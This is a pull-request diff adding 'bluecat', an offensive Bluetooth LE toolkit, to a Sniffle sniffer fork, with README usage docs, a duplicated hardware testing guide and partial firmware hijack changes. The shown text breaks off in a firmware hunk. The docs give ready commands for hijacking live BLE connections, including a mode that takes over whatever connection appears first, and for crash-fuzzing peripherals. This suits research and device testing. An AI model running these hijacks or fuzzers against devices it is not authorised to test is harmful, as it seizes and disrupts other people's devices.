### PR TITLE
Add bluecat BLE toolkit, connection hijacking, and improve CatSniffer V3 support

### DIFF
--- a/README.md
+++ b/README.md
@@ -473,6 +473,171 @@ Actively scan on channel 39 for advertisements with RSSI greater than -50.
 ./scanner.py -c 39 -r -50
 ```
 
+## bluecat Usage
+
+`bluecat` is an offensive BLE toolkit added in this fork, built on the same
+host-side Sniffle library. It drives a flashed Sniffle board (CatSniffer,
+SONOFF, or TI Launchpad) to scan, audit, connect to, hijack, enumerate the GATT
+database of, and fuzz a BLE peripheral, then drops into an interactive REPL.
+Everything runs from a single `bluecat.py` dispatcher with per-task subcommands.
+
+```
+usage: bluecat [-h] command ...
+
+bluecat - BLE recon/hijack/GATT tool (CatSniffer)
+
+positional arguments:
+  command
+    scan      Discover nearby BLE devices (passive scan)
+    audit     Vulnerability-assess BLE devices (no MAC = audit-on-discovery sweep)
+    connect   Connect as central -> GATT enumeration -> interactive REPL
+    hijack    Take over a live connection -> GATT enum -> REPL; no MAC = follow first seen
+    fuzz      Multi-layer BLE fuzzer (values/sweep/opcodes/ll)
+    sniff     Passively follow a live BLE connection and print ATT operations
+```
+
+Run `bluecat <command> -h` for the options of each subcommand.
+
+- `scan` passively lists every advertising device seen on the selected
+  channel(s) during the dwell window, as a table or `--json`.
+- `audit [MAC]` runs a non-destructive vulnerability assessment (open control
+  points, trackability, sensitive/OTA characteristics). With no MAC it audits
+  every connectable advertiser as it is discovered; with a MAC it audits that
+  one device.
+- `connect MAC` initiates an outbound connection as central, enumerates the
+  GATT database, and opens an interactive REPL for reads/writes/subscriptions.
+- `hijack [MAC]` sniffs and then takes over an existing connection. With a MAC
+  it waits for and hijacks a connection to that peripheral; with no MAC it
+  follows the first connection seen.
+- `fuzz [MAC]` fuzzes a peripheral over a connect, hijack, or follow session.
+  Pick a layer with `--mode {values,sweep,opcodes,ll}`. Crash auto-resume only
+  works in connect mode, where bluecat owns the link.
+- `sniff MAC` passively prints every ATT read, write, notification, and
+  indication (handle and value) on a live connection without transmitting.
+  Useful recon before hijacking, to find the control-point handle and command
+  bytes.
+
+Notes:
+
+- A Sniffle board flashed with current firmware is required (see Firmware
+  Installation above). Connection hijacking (used by `hijack`, and by `fuzz` in
+  hijack or follow mode) is part of recent Sniffle firmware, so flash the latest
+  build; older firmware without it can still scan, audit, connect, and sniff.
+- bluecat auto-detects the board, including the CatSniffer's serial port and its
+  921600 baud rate, so you normally pass neither `-s` nor `-b`. (The base Sniffle
+  utilities do not auto-detect that baud, which is why they need `-b 921600`.)
+  Pass `-s PORT` or `-b BAUD` only if auto-detection does not find your board.
+- Cheap peripherals such as ELK-BLEDOM strips use a public address; pass
+  `--public` for those.
+
+Scan all advertising channels for 8 seconds and print a table.
+
+```
+./bluecat.py scan --time 8
+```
+
+Audit every connectable device discovered on channel 37.
+
+```
+./bluecat.py audit -c 37
+```
+
+Connect to a peripheral, enumerate its GATT database, and open the REPL.
+
+```
+./bluecat.py connect AA:BB:CC:DD:EE:FF
+```
+
+Passively watch ATT traffic on a live connection to find the control handle.
+
+```
+./bluecat.py sniff AA:BB:CC:DD:EE:FF
+```
+
+Hijack the next connection to a target and enumerate it (needs hijack-capable firmware).
+
+```
+./bluecat.py hijack AA:BB:CC:DD:EE:FF
+```
+
+### Fuzzing with `bluecat fuzz`
+
+`bluecat fuzz` drives one of four fuzzing strategies over a live link and watches
+the target for crashes and anomalies. It is the most involved subcommand, so it
+is worth covering in detail.
+
+**Session - how the link is obtained.** The same three access modes as the rest
+of bluecat:
+
+- Give a MAC and no `--hijack`: bluecat *connects* to that peripheral as central.
+  This is the only mode with crash-resume (below), because bluecat owns the link
+  and can reconnect on its own.
+- `--hijack MAC`: bluecat sniffs, then *hijacks* an existing connection to that
+  peripheral. Requires hijack-capable firmware (see the Notes above).
+- Omit the MAC: *follow* mode, where bluecat takes over the first connection it
+  sees. Also requires hijack-capable firmware.
+
+**Modes - what actually gets sent (`--mode`, required).**
+
+- `values`: mutate the value written to a single characteristic handle
+  (`--handle`, default `0x0001`). With no `--seed` it writes a fixed battery of
+  edge cases: empty, `0x00`, `0xff`, 20 bytes of `0xff`, 244 bytes of `0xff`
+  (a max-length ATT write), and 64 bytes of `0x41`. With `--seed deadbeef` it
+  also sends the seed itself, one high-bit-flipped variant per byte, the seed
+  padded with 8 null bytes, and the seed shortened by one byte. Point this at a
+  known writable control point - find one first with `sniff` or `connect`.
+- `sweep`: write one payload to every handle in `[--start, --end]` (default
+  `0x0001` to `0x00FF`). The payload is `--seed` if given, otherwise a single
+  `0x00`. This maps the writable attack surface: which handles accept writes,
+  which are hidden, and which crash on write.
+- `opcodes`: send a fixed set of malformed and truncated raw ATT PDUs (unknown
+  opcode, truncated Read/Write requests, over-long Find Info, a zero-MTU
+  exchange, reserved opcodes). Exercises the peripheral's ATT parser. No handle
+  needed.
+- `ll`: send a fixed set of malformed Link-Layer control PDUs (unknown control
+  opcode, zero-length, over-long, an edge-value LL_LENGTH_REQ, an all-zero
+  LL_FEATURE_REQ). Exercises the controller below ATT. No handle needed.
+
+**Detection.** After every payload bluecat checks whether the link is still
+alive. An ATT error response is recorded as an *anomaly*; a dropped link or a
+transport timeout is recorded as a *crash*. In connect mode a crash triggers a
+reconnect and fuzzing continues; in hijack and follow mode there is nothing to
+reconnect to, so fuzzing stops at the first crash.
+
+**Output.** `-o FILE.jsonl` writes one JSON record per test as it runs
+(`{"n", "kind", "sent", "result", "crashed"}`, with `sent` in hex), flushed
+live. A summary `{tested, crashes, anomalies}` prints at the end.
+
+**A typical workflow.**
+
+First find a writable control-point handle by watching the app talk to the
+device, then fuzz that handle's values (seeded with a real command you saw):
+
+```
+./bluecat.py sniff AA:BB:CC:DD:EE:FF
+./bluecat.py fuzz AA:BB:CC:DD:EE:FF --mode values --handle 0x0010 --seed 7e0705 -o fuzz.jsonl
+```
+
+Map the rest of the writable surface with a sweep:
+
+```
+./bluecat.py fuzz AA:BB:CC:DD:EE:FF --mode sweep --start 0x0001 --end 0x00ff
+```
+
+Test the ATT and link-layer parsers with malformed PDUs (no handle needed):
+
+```
+./bluecat.py fuzz AA:BB:CC:DD:EE:FF --mode opcodes
+./bluecat.py fuzz AA:BB:CC:DD:EE:FF --mode ll
+```
+
+To fuzz a device that holds its own connection open (e.g. paired to its app),
+take that connection over instead of dialing your own (needs hijack-capable firmware):
+
+```
+./bluecat.py fuzz AA:BB:CC:DD:EE:FF --hijack --mode opcodes
+```
+
 ## Obtaining the IRK
 
 If you have a rooted Android phone, you can find IRKs (and LTKs) in the Bluedroid

--- a/docs/bluecat-testing-guide.md
+++ b/docs/bluecat-testing-guide.md
@@ -1,158 +1,216 @@
-# bluecat — hardware testing guide
+# bluecat hardware testing guide
 
-Test order goes easiest → hardest. Stop at the first failure and capture the output (see "Reporting back").
+A bench procedure for exercising bluecat against real hardware, ordered from
+easiest to hardest. Stop at the first failure and capture the output.
 
 ## 0. Setup (once)
 
 ```bash
-cd /Users/wero1414/Sniffle/python_cli
-python3 -m pip install pyserial    # if not already
+cd python_cli
+python3 -m pip install pyserial      # if not already installed
 chmod +x bluecat.py
 ```
 
-Set these for your bench (substitute your values):
+Set these for your bench (substitute your own values):
 
 ```bash
-export PORT=/dev/cu.usbmodem11201        # your CatSniffer port (ls /dev/cu.usbmodem*)
-export BAUD=921600                       # CatSniffer V3 = 921600 (the _1M firmware). DO NOT omit.
-export LED=BE:96:24:00:07:DA             # your ELK-BLEDOM strip (a PUBLIC address)
+export PORT=/dev/cu.usbmodem11201    # your CatSniffer port (ls /dev/cu.usbmodem*)
+export LED=BE:96:24:00:07:DA         # an ELK-BLEDOM strip (a PUBLIC address) as a target
 ```
 
-> **Baud rate matters.** CatSniffer V3 runs the CC1352 UART at 921600 (the `_1M` build). `bluecat` defaults to 2 Mbaud, so you MUST pass `-b $BAUD` on every command or it won't talk to the sniffer.
+Notes:
 
-**Firmware:** Tests 1–3 (scan/connect) work with any Sniffle firmware on the board. Tests 4–5 (hijack/follow) need the **hijack firmware** flashed (`fw/sniffle.hex`, the build we made). Flash it before those.
+- bluecat auto-detects the CatSniffer, including its 921600 baud rate, so you
+  normally do not pass `-s` or `-b`. The `-s $PORT` below is optional; it just
+  pins the port when several serial devices are present. Add `-b BAUD` only if
+  auto-detection does not find your board.
+- Firmware: scan, audit, connect, and sniff work with any Sniffle build. Hijack
+  and follow need a firmware build that includes connection hijacking (recent
+  Sniffle firmware); flash the latest build before those tests.
 
 Smoke check (no hardware needed):
+
 ```bash
 ./bluecat.py --help && ./bluecat.py scan --help && ./bluecat.py fuzz --help
 ```
-Expect three help screens, no errors.
+
+Expect three help screens and no errors.
 
 ---
 
-## 1. Scan — list nearby devices  (passive, easiest)
+## 1. Scan: list nearby devices (passive, easiest)
 
 ```bash
-./bluecat.py scan -s $PORT -b $BAUD --time 10 | tee /tmp/bc_scan.txt
+./bluecat.py scan -s $PORT --time 10 | tee /tmp/bc_scan.txt
 ```
-**Expect:** a table of nearby BLE devices (your phone, the ELK-BLEDOM strip, neighbours) with MAC, name, RSSI, addr type, posture `UNKNOWN`, #svcs. Sorted by RSSI.
-**PASS:** the ELK-BLEDOM appears in the list.
-**If it fails:** "Sniffle device not found" → wrong `-s`/`-b`. Empty table → nothing advertising nearby, or wrong channel (`-c 37/38/39`).
+
+Expect a table of nearby BLE devices (your phone, the ELK-BLEDOM strip,
+neighbours) with MAC, name, RSSI, address type, and service count, sorted by
+RSSI.
+PASS: the ELK-BLEDOM appears in the list.
+If it fails: "Sniffle device not found" means the port or baud is wrong. An
+empty table means nothing is advertising nearby, or the wrong channel
+(`-c 37/38/39`).
 
 ---
 
-## 2. Scan + probe — classify open vs encrypted  (active)
+## 2. Audit: classify open vs encrypted (active)
 
-Make sure the strip is **not** connected to your phone (so it's connectable).
+Make sure the strip is not connected to your phone (so it is connectable). With
+no MAC, `audit` connects to each connectable advertiser it discovers and
+assesses it.
+
 ```bash
-./bluecat.py scan -s $PORT -b $BAUD --probe --time 8 | tee /tmp/bc_probe.txt
+./bluecat.py audit -s $PORT --time 8 | tee /tmp/bc_audit.txt
 ```
-**Expect:** same table, but the `posture` column is filled by briefly connecting to each device: the ELK-BLEDOM should show `OPEN`; phones/locks/etc. that require pairing show `ENCRYPTED_*`.
-**PASS:** ELK-BLEDOM shows `OPEN` (highlighted as the alert).
-**Note:** slower (connects to each device one at a time); some devices won't accept a connection and stay `UNKNOWN`.
+
+Expect the discovered devices with a posture filled in by briefly connecting to
+each: the ELK-BLEDOM should show OPEN; devices that require pairing show an
+encrypted posture.
+PASS: the ELK-BLEDOM shows OPEN.
+Note: this is slower because it connects to devices one at a time; some devices
+will not accept a connection and stay UNKNOWN.
 
 ---
 
-## 3. Connect + enumerate + REPL  (core, no hijack)
+## 3. Connect: enumerate + REPL (core, no hijack)
 
-Disconnect the phone from the strip first. ELK-BLEDOM uses a **public** address, so pass `--public`.
+Disconnect the phone from the strip first. ELK-BLEDOM uses a public address, so
+pass `--public`.
+
 ```bash
-./bluecat.py --mac $LED --connect --public -s $PORT -b $BAUD | tee /tmp/bc_connect.txt
+./bluecat.py connect $LED --public -s $PORT | tee /tmp/bc_connect.txt
 ```
-**Expect:**
-1. `[+] in CENTRAL — posture: OPEN`
-2. The GATT tree: services `0x1800`, `0x1801`, `0xFFF0`, with the control char value handle `0x000E`.
+
+Expect:
+1. `[+] in CENTRAL - posture: OPEN`
+2. The GATT tree: services 0x1800, 0x1801, 0xFFF0, with the control
+   characteristic value handle 0x000E.
 3. A `bluecat>` prompt.
 
 In the REPL, try:
+
 ```
-read 0x0003                       # GAP Device Name -> "ELK-BLEDOM..."
-write 0x000e 7e070503ff000010ef   # RED
-write 0x000e 7e07050300ff0010ef   # GREEN
-write 0x000e 7e0705030000ff10ef   # BLUE
+read 0x0003                       # GAP Device Name
+write 0x000e 7e070503ff000010ef   # red
+write 0x000e 7e07050300ff0010ef   # green
+write 0x000e 7e0705030000ff10ef   # blue
 enum                              # re-print the tree
-sub 0x0011                        # subscribe to a CCCD handle (if the strip has a notify char)
 info
 quit
 ```
-**PASS:** the strip changes colour on the writes, and `enum`/`read` return sensible data.
-**If it fails:** can't reach CENTRAL → the strip is still connected to the phone (only allows one link) or it's not connectable; wrong address type (try without `--public`).
+
+PASS: the strip changes colour on the writes, and enum/read return sensible
+data.
+If it fails: not reaching CENTRAL usually means the strip is still connected to
+the phone (it allows only one link) or is not connectable; try toggling
+`--public`.
 
 ---
 
-## 4. Hijack + enumerate  (needs hijack firmware flashed)
+## 4. Hijack: take over a live connection (needs hijack-capable firmware)
 
-Flash `fw/sniffle.hex` first. **Connect the phone to the strip and keep it connected.**
+Flash a firmware build with hijacking first. Connect the phone to the strip and
+keep it connected.
+
 ```bash
-./bluecat.py --mac $LED --hijack --public -s $PORT -b $BAUD | tee /tmp/bc_hijack.txt
+./bluecat.py hijack $LED --public -s $PORT | tee /tmp/bc_hijack.txt
 ```
-**Expect:** sniff → "Tracking… stable" → fire hijack → `in CENTRAL` → **the phone loses control** → GATT tree → REPL (same commands as Test 3).
-**PASS:** phone drops the connection, you can drive the strip's colour from the REPL.
-**Known limitation:** this rides the firmware takeover we were still debugging (run #5). If the strip's connection renegotiated to a short interval / long timeout, the takeover can drop immediately and the phone keeps control. If that happens, capture `/tmp/bc_hijack.txt` and the `HJ END:` line.
+
+Expect: sniff, then "tracking ... stable", then the hijack fires, `in CENTRAL`,
+the phone loses control, the GATT tree, and the REPL (same commands as Test 3).
+PASS: the phone drops the connection and you can drive the strip from the REPL.
+Limitation: if the target renegotiates its connection to a short interval or a
+long timeout, the takeover can drop immediately and the original central keeps
+control. If that happens, capture `/tmp/bc_hijack.txt` and the `HJ END:` line.
 
 ---
 
-## 5. Follow — hijack the first connection seen  (no MAC)
+## 5. Follow: hijack the first connection seen (no MAC)
 
-Flash hijack firmware. Start bluecat, THEN connect the phone to any unencrypted device.
+Same firmware requirement as Test 4. With no MAC, `hijack` takes over the first
+connection it sees. Start bluecat, then connect the phone to any unencrypted
+device.
+
 ```bash
-./bluecat.py --public -s $PORT -b $BAUD | tee /tmp/bc_follow.txt
+./bluecat.py hijack --public -s $PORT | tee /tmp/bc_follow.txt
 ```
-(`--public` only matters if the caught device is public; harmless otherwise.)
-**Expect:** `[*] follow mode: catching first connection on ch 37...`, then it catches a connection, reports the caught address, hijacks, enumerates.
-**PASS:** it latches and takes over a connection without you specifying a MAC.
-**Note:** no 3-channel hopping in follow mode, so it only catches connections that start on ch 37 — retry, or try `-c 38`/`-c 39`.
+
+(`--public` only matters if the caught device uses a public address; it is
+harmless otherwise.)
+Expect: "follow mode: catching first connection on ch 37...", then it catches a
+connection, reports the caught address, hijacks, and enumerates.
+PASS: it latches onto and takes over a connection without you specifying a MAC.
+Note: follow mode does not hop across the three advertising channels, so it only
+catches connections that start on ch 37. Retry, or try `-c 38` / `-c 39`.
 
 ---
 
-## 6. Fuzz  (most complex)
+## 6. Fuzz (most complex)
 
-Disconnect the phone (use connect mode so crash-resume works).
+Disconnect the phone and use connect mode so crash-resume works.
 
-**Value fuzzing** (mutate writes to the control characteristic):
+Value fuzzing (mutate writes to the control characteristic):
+
 ```bash
-./bluecat.py fuzz --mac $LED --connect --public --mode values \
-  --handle 0x000e --seed 7e070503ff000010ef -o /tmp/fuzz_values.jsonl -s $PORT -b $BAUD
+./bluecat.py fuzz $LED --public --mode values \
+  --handle 0x000e --seed 7e070503ff000010ef -o /tmp/fuzz_values.jsonl -s $PORT
 ```
-**Handle sweep** (write a payload to every handle in a range):
+
+Handle sweep (write a payload to every handle in a range):
+
 ```bash
-./bluecat.py fuzz --mac $LED --connect --public --mode sweep \
-  --seed 00 --start 0x0001 --end 0x00ff -o /tmp/fuzz_sweep.jsonl -s $PORT -b $BAUD
+./bluecat.py fuzz $LED --public --mode sweep \
+  --seed 00 --start 0x0001 --end 0x00ff -o /tmp/fuzz_sweep.jsonl -s $PORT
 ```
-**ATT-opcode** and **LL-control** fuzzing:
+
+ATT-opcode and LL-control fuzzing:
+
 ```bash
-./bluecat.py fuzz --mac $LED --connect --public --mode opcodes -o /tmp/fuzz_op.jsonl -s $PORT -b $BAUD
-./bluecat.py fuzz --mac $LED --connect --public --mode ll      -o /tmp/fuzz_ll.jsonl  -s $PORT -b $BAUD
+./bluecat.py fuzz $LED --public --mode opcodes -o /tmp/fuzz_op.jsonl -s $PORT
+./bluecat.py fuzz $LED --public --mode ll      -o /tmp/fuzz_ll.jsonl -s $PORT
 ```
-**Expect:** each run sends its inputs, writes a JSONL line per input to the `-o` file, and prints a summary `{tested, crashes, anomalies}`. On a crash (device stops responding / link drops) in connect mode it reconnects and continues.
-**PASS:** the run completes, the `.jsonl` file has one line per input, and the summary prints. Watch the strip — a crash/reset is a finding (check the `crashed:true` lines).
-**Note:** crash-resume only works in `--connect` mode (you own the link); `--hijack`/follow can't auto-reconnect.
+
+Expect: each run sends its inputs, writes one JSONL line per input to the `-o`
+file, and prints a summary `{tested, crashes, anomalies}`. On a crash (the
+device stops responding or the link drops) in connect mode, it reconnects and
+continues.
+PASS: the run completes, the .jsonl file has one line per input, and the summary
+prints. Watch the strip: a crash or reset is a finding (check the
+`"crashed": true` lines).
+Note: crash-resume only works in connect mode (you own the link); hijack and
+follow cannot auto-reconnect.
 
 ---
 
 ## 7. PCAP capture (any access mode)
 
-Add `-o file.pcap` to any access command (Tests 3–5), e.g.:
+Add `-o file.pcap` to any access command (Tests 3 to 5), for example:
+
 ```bash
-./bluecat.py --mac $LED --connect --public -o /tmp/bc.pcap -s $PORT -b $BAUD
+./bluecat.py connect $LED --public -o /tmp/bc.pcap -s $PORT
 ```
-**PASS:** `/tmp/bc.pcap` opens in Wireshark and shows the session's link-layer packets. (Use this with crackle/Wireshark + LTK for encrypted targets.)
+
+PASS: /tmp/bc.pcap opens in Wireshark and shows the session's link-layer
+packets.
 
 ---
 
-## Reporting back
+## Capturing output for a bug report
 
-For any failure, send me:
-- The command you ran and the captured `/tmp/bc_*.txt` (you `tee`'d them).
+For any failure, keep:
+
+- The exact command and the `/tmp/bc_*.txt` output (the `tee` files above).
 - For hijack issues: the `HJ ...` / `HJ END:` debug lines.
-- For fuzz crashes: the `crashed:true` lines from the `.jsonl`.
+- For fuzz crashes: the `"crashed": true` lines from the .jsonl.
 
 ## Quick troubleshooting
+
 | Symptom | Likely cause |
 |---|---|
-| "Sniffle device not found" | wrong `-s` port, or `-b 921600` missing |
-| Garbage / no response | wrong baud (must be `921600` for CatSniffer V3) |
-| Can't reach CENTRAL on `--connect` | target already connected to phone, or needs `--public` toggled |
-| Hijack drops instantly, phone keeps control | run-#5 firmware issue (renegotiated conn params) |
-| LED doesn't change | wrong handle/format — use `0x000e` + `7e0705 03 RRGGBB 10ef` |
-| Hijack target reported "encrypted" | expected — bluecat won't hijack encrypted links |
+| "Sniffle device not found" | wrong `-s` port, or a non-CatSniffer board that needs an explicit `-b` |
+| Garbage or no response | wrong baud on a board that was not auto-detected |
+| Cannot reach CENTRAL on connect | target already connected to a phone, or `--public` needs toggling |
+| Hijack drops instantly, other central keeps control | target renegotiated its connection parameters |
+| LED does not change | wrong handle or format; use `0x000e` with `7e0705 03 RRGGBB 10ef` |
+| Hijack target reported "encrypted" | expected; bluecat will not hijack encrypted links |

--- a/docs/bluecat-testing-guide.md
+++ b/docs/bluecat-testing-guide.md
@@ -1,0 +1,158 @@
+# bluecat — hardware testing guide
+
+Test order goes easiest → hardest. Stop at the first failure and capture the output (see "Reporting back").
+
+## 0. Setup (once)
+
+```bash
+cd /Users/wero1414/Sniffle/python_cli
+python3 -m pip install pyserial    # if not already
+chmod +x bluecat.py
+```
+
+Set these for your bench (substitute your values):
+
+```bash
+export PORT=/dev/cu.usbmodem11201        # your CatSniffer port (ls /dev/cu.usbmodem*)
+export BAUD=921600                       # CatSniffer V3 = 921600 (the _1M firmware). DO NOT omit.
+export LED=BE:96:24:00:07:DA             # your ELK-BLEDOM strip (a PUBLIC address)
+```
+
+> **Baud rate matters.** CatSniffer V3 runs the CC1352 UART at 921600 (the `_1M` build). `bluecat` defaults to 2 Mbaud, so you MUST pass `-b $BAUD` on every command or it won't talk to the sniffer.
+
+**Firmware:** Tests 1–3 (scan/connect) work with any Sniffle firmware on the board. Tests 4–5 (hijack/follow) need the **hijack firmware** flashed (`fw/sniffle.hex`, the build we made). Flash it before those.
+
+Smoke check (no hardware needed):
+```bash
+./bluecat.py --help && ./bluecat.py scan --help && ./bluecat.py fuzz --help
+```
+Expect three help screens, no errors.
+
+---
+
+## 1. Scan — list nearby devices  (passive, easiest)
+
+```bash
+./bluecat.py scan -s $PORT -b $BAUD --time 10 | tee /tmp/bc_scan.txt
+```
+**Expect:** a table of nearby BLE devices (your phone, the ELK-BLEDOM strip, neighbours) with MAC, name, RSSI, addr type, posture `UNKNOWN`, #svcs. Sorted by RSSI.
+**PASS:** the ELK-BLEDOM appears in the list.
+**If it fails:** "Sniffle device not found" → wrong `-s`/`-b`. Empty table → nothing advertising nearby, or wrong channel (`-c 37/38/39`).
+
+---
+
+## 2. Scan + probe — classify open vs encrypted  (active)
+
+Make sure the strip is **not** connected to your phone (so it's connectable).
+```bash
+./bluecat.py scan -s $PORT -b $BAUD --probe --time 8 | tee /tmp/bc_probe.txt
+```
+**Expect:** same table, but the `posture` column is filled by briefly connecting to each device: the ELK-BLEDOM should show `OPEN`; phones/locks/etc. that require pairing show `ENCRYPTED_*`.
+**PASS:** ELK-BLEDOM shows `OPEN` (highlighted as the alert).
+**Note:** slower (connects to each device one at a time); some devices won't accept a connection and stay `UNKNOWN`.
+
+---
+
+## 3. Connect + enumerate + REPL  (core, no hijack)
+
+Disconnect the phone from the strip first. ELK-BLEDOM uses a **public** address, so pass `--public`.
+```bash
+./bluecat.py --mac $LED --connect --public -s $PORT -b $BAUD | tee /tmp/bc_connect.txt
+```
+**Expect:**
+1. `[+] in CENTRAL — posture: OPEN`
+2. The GATT tree: services `0x1800`, `0x1801`, `0xFFF0`, with the control char value handle `0x000E`.
+3. A `bluecat>` prompt.
+
+In the REPL, try:
+```
+read 0x0003                       # GAP Device Name -> "ELK-BLEDOM..."
+write 0x000e 7e070503ff000010ef   # RED
+write 0x000e 7e07050300ff0010ef   # GREEN
+write 0x000e 7e0705030000ff10ef   # BLUE
+enum                              # re-print the tree
+sub 0x0011                        # subscribe to a CCCD handle (if the strip has a notify char)
+info
+quit
+```
+**PASS:** the strip changes colour on the writes, and `enum`/`read` return sensible data.
+**If it fails:** can't reach CENTRAL → the strip is still connected to the phone (only allows one link) or it's not connectable; wrong address type (try without `--public`).
+
+---
+
+## 4. Hijack + enumerate  (needs hijack firmware flashed)
+
+Flash `fw/sniffle.hex` first. **Connect the phone to the strip and keep it connected.**
+```bash
+./bluecat.py --mac $LED --hijack --public -s $PORT -b $BAUD | tee /tmp/bc_hijack.txt
+```
+**Expect:** sniff → "Tracking… stable" → fire hijack → `in CENTRAL` → **the phone loses control** → GATT tree → REPL (same commands as Test 3).
+**PASS:** phone drops the connection, you can drive the strip's colour from the REPL.
+**Known limitation:** this rides the firmware takeover we were still debugging (run #5). If the strip's connection renegotiated to a short interval / long timeout, the takeover can drop immediately and the phone keeps control. If that happens, capture `/tmp/bc_hijack.txt` and the `HJ END:` line.
+
+---
+
+## 5. Follow — hijack the first connection seen  (no MAC)
+
+Flash hijack firmware. Start bluecat, THEN connect the phone to any unencrypted device.
+```bash
+./bluecat.py --public -s $PORT -b $BAUD | tee /tmp/bc_follow.txt
+```
+(`--public` only matters if the caught device is public; harmless otherwise.)
+**Expect:** `[*] follow mode: catching first connection on ch 37...`, then it catches a connection, reports the caught address, hijacks, enumerates.
+**PASS:** it latches and takes over a connection without you specifying a MAC.
+**Note:** no 3-channel hopping in follow mode, so it only catches connections that start on ch 37 — retry, or try `-c 38`/`-c 39`.
+
+---
+
+## 6. Fuzz  (most complex)
+
+Disconnect the phone (use connect mode so crash-resume works).
+
+**Value fuzzing** (mutate writes to the control characteristic):
+```bash
+./bluecat.py fuzz --mac $LED --connect --public --mode values \
+  --handle 0x000e --seed 7e070503ff000010ef -o /tmp/fuzz_values.jsonl -s $PORT -b $BAUD
+```
+**Handle sweep** (write a payload to every handle in a range):
+```bash
+./bluecat.py fuzz --mac $LED --connect --public --mode sweep \
+  --seed 00 --start 0x0001 --end 0x00ff -o /tmp/fuzz_sweep.jsonl -s $PORT -b $BAUD
+```
+**ATT-opcode** and **LL-control** fuzzing:
+```bash
+./bluecat.py fuzz --mac $LED --connect --public --mode opcodes -o /tmp/fuzz_op.jsonl -s $PORT -b $BAUD
+./bluecat.py fuzz --mac $LED --connect --public --mode ll      -o /tmp/fuzz_ll.jsonl  -s $PORT -b $BAUD
+```
+**Expect:** each run sends its inputs, writes a JSONL line per input to the `-o` file, and prints a summary `{tested, crashes, anomalies}`. On a crash (device stops responding / link drops) in connect mode it reconnects and continues.
+**PASS:** the run completes, the `.jsonl` file has one line per input, and the summary prints. Watch the strip — a crash/reset is a finding (check the `crashed:true` lines).
+**Note:** crash-resume only works in `--connect` mode (you own the link); `--hijack`/follow can't auto-reconnect.
+
+---
+
+## 7. PCAP capture (any access mode)
+
+Add `-o file.pcap` to any access command (Tests 3–5), e.g.:
+```bash
+./bluecat.py --mac $LED --connect --public -o /tmp/bc.pcap -s $PORT -b $BAUD
+```
+**PASS:** `/tmp/bc.pcap` opens in Wireshark and shows the session's link-layer packets. (Use this with crackle/Wireshark + LTK for encrypted targets.)
+
+---
+
+## Reporting back
+
+For any failure, send me:
+- The command you ran and the captured `/tmp/bc_*.txt` (you `tee`'d them).
+- For hijack issues: the `HJ ...` / `HJ END:` debug lines.
+- For fuzz crashes: the `crashed:true` lines from the `.jsonl`.
+
+## Quick troubleshooting
+| Symptom | Likely cause |
+|---|---|
+| "Sniffle device not found" | wrong `-s` port, or `-b 921600` missing |
+| Garbage / no response | wrong baud (must be `921600` for CatSniffer V3) |
+| Can't reach CENTRAL on `--connect` | target already connected to phone, or needs `--public` toggled |
+| Hijack drops instantly, phone keeps control | run-#5 firmware issue (renegotiated conn params) |
+| LED doesn't change | wrong handle/format — use `0x000e` + `7e0705 03 RRGGBB 10ef` |
+| Hijack target reported "encrypted" | expected — bluecat won't hijack encrypted links |

--- a/fw/CommandTask.h
+++ b/fw/CommandTask.h
@@ -34,5 +34,6 @@ void CommandTask_init(void);
 #define COMMAND_ADV_EXT         0x25
 #define COMMAND_CRC_VALID       0x26
 #define COMMAND_TX_POWER        0x27
+#define COMMAND_HIJACK          0x28
 
 #endif /* COMMANDTASK_H */

--- a/fw/PacketTask.c
+++ b/fw/PacketTask.c
@@ -34,7 +34,9 @@
 #define PACKET_TASK_STACK_SIZE 1024
 #define PACKET_TASK_PRIORITY   3
 
+#ifndef SNIFFLE_CATSNIFFER_LED_DIO
 #define RX_ACTIVITY_LED CONFIG_LED_0
+#endif
 
 /***** Type declarations *****/
 
@@ -58,7 +60,9 @@ static void packetTaskFunction(UArg arg0, UArg arg1);
 static bool macFilterCheck(BLE_Frame *frame);
 
 /* LED driver handle */
+#ifndef SNIFFLE_CATSNIFFER_LED_DIO
 static LED_Handle ledHandle;
+#endif
 
 // size must be a power of 2
 #define JANKY_QUEUE_SIZE 8u
@@ -83,6 +87,12 @@ void PacketTask_init(void) {
     }
 
     /* Open LED pins */
+#ifdef SNIFFLE_CATSNIFFER_LED_DIO
+    /* CatSniffer V3 wires the RX-activity LED to a fixed DIO that the stock
+     * LP_CC1352P7_1 board definition does not map, so drive it directly via
+     * the GPIO driver instead of the board apps/LED instance. */
+    GPIO_setConfig(SNIFFLE_CATSNIFFER_LED_DIO, GPIO_CFG_OUT_STD | GPIO_CFG_OUT_LOW);
+#else
     LED_Params ledParams;
     LED_init();
     ledHandle = LED_open(RX_ACTIVITY_LED, &ledParams);
@@ -90,6 +100,7 @@ void PacketTask_init(void) {
     {
         System_abort("Error initializing board 3.3V domain pins\n");
     }
+#endif
 
     packetAvailSem = Semaphore_create(0, NULL, NULL);
 
@@ -197,13 +208,21 @@ static void packetTaskFunction(UArg arg0, UArg arg1)
         Semaphore_pend(packetAvailSem, BIOS_WAIT_FOREVER);
 
         // activate LED
+#ifdef SNIFFLE_CATSNIFFER_LED_DIO
+        GPIO_write(SNIFFLE_CATSNIFFER_LED_DIO, 1);
+#else
         LED_write(ledHandle, 1);
+#endif
 
         // send packet
         sendPacket(s_frames + (atomic_load(&queue_tail) & JANKY_QUEUE_MASK));
 
         // deactivate LED
+#ifdef SNIFFLE_CATSNIFFER_LED_DIO
+        GPIO_write(SNIFFLE_CATSNIFFER_LED_DIO, 0);
+#else
         LED_write(ledHandle, 0);
+#endif
 
         // we can now handle a new packet (wraparound is OK)
         atomic_fetch_add(&queue_tail, 1);

--- a/fw/RadioTask.c
+++ b/fw/RadioTask.c
@@ -147,6 +147,9 @@ static uint8_t s_scanRspLen;
 static uint8_t s_scanRspData[31];
 
 uint8_t g_pkt_dir = 0;
+static uint8_t hijack_next_tx_sn = 0; // last P->C NESN seen in DATA state
+static uint8_t hijack_report = 0; // emit telemetry for first N central events after a live hijack
+static bool hijack_active = false; // true from a live hijack until the connection ends (end-reason telemetry)
 
 // Maximum time (in microseconds) for DelayHopTrigger to trigger a hop, then
 // for the radio to tune to the next advertising channel, and start listening.
@@ -237,6 +240,8 @@ static void afterConnEvent(bool peripheral, bool gotData)
         connTimeoutTime = curRadioTime + rconf.connTimeoutTicks;
     else if (connTimeoutTime - curRadioTime > 0x80000000)
     {
+        if (hijack_active)
+            dprintf("HJ END: supervision timeout ev=%lu", (unsigned long)connEventCount);
         handleConnFinished();
         return;
     }
@@ -479,6 +484,7 @@ static void radioTaskFunction(UArg arg0, UArg arg1)
